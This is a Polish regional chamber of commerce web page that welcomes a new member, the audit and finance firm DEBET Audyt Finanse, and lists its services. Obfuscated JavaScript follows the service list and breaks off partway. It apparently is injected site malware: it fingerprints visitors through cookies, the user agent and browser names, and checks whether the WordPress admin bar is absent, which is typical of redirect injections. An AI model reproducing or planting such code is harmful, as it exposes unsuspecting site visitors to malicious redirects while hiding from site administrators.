Witamy nową Firmę w Izbie DEBET AUDYT FINANSE! | Północna Izba Gospodarcza w Koszalinie

Miło nam poinformować, że do naszej izby dołączyła nowa firma – DEBET Audyt Finanse Sp. z o.o.

Oferta Spółki:

 • badaniem sprawozdań finansowych,
 • sporządzaniem dokumentacji podatkowej w zakresie cen transferowych,
 • analiza due diligence,
 • przygotowywanie planów dotyczących przekształceń własnościowych, fuzji i podziałów,
  doradztwo finansowo-inwestycyjnym,
 • wykonywanie ekspertyz i opinii finansowych, ekonomicznych itp.,
 • przygotowywanie studium wykonalności projektów inwestycyjnych,
 • przygotowywanie planów restrukturyzacyjnych,
 • przygotowywanie oceny sytuacji ekonomicznej oraz zdolności kontynuacji prowadzonej działalności,
 • poszukiwaniem źródeł finansowania projektów oraz negocjacją warunków kredytowych,
 • audyt realizacji projektów finansowych przy pomocy środków dłużnych,
 • doradztwo prawne,
 • wycena przedsiębiorstw,
 • opracowywanie umów spółek,
 • kompleksowe zakładaniem firm.

Firma świadczy usługi na terenie całego kraju.

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m